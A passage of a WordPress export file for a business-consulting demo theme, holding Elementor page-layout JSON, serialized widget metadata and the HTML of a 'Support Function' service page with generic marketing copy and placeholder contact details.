		<wp:meta_value><![CDATA[[{"id":"6faa64b","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"0bb9c88","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6824581","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"3400a2a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"c4b8ef3","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a0af2ca","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4ad2da5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c3411e5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fddc28e","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"fbccab8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2afaea5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"a8024cf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"d420dea","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"ab89b5a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8c96bde","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#52C5B6","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"dc8f05f","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c88ecd3","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a061656","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"b9814ba","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3838be4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"72c6e5e","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ee945f4","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05b9e13","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"9ff3f8e","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"2a1f3b6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home5.png","id":2372},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"5c20bfd","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"a5714fa","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #52c5b6;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b7198e9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"a53f436","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"d016178","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"676aa62","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"aee7a43","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"8dd2aa8","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"67ff888","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"3da52cb","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#52C5B6","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4ffbddf","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"ecb740e","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"b0441a2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"00f028b","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9c23145","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"758fa65","elType":"widget","settings":{"text":"Divider","color":"#52C5B6","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"d84b707","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1aa5536","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7cf28b7","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c141a94","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home5.jpg","id":2373},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7057f75","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"a453fc6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ec2dd87","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"bccf2de","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cef75d3","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"870df1e","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"7f208c6","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Support Function</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/support-function/</link>
		<pubDate>Tue, 22 Sep 2020 02:54:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=999</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" />											
			<h3>We Conduct Marketing Research</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation
</h6>		
					90				
			<h6>finance strategy</h6>		
		<h3>We are Always Ready to Assist Our Clients</h3><p>developing financial processes and procedures</p>		
			<h4>How It Works & How We Do It</h4>		
		<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
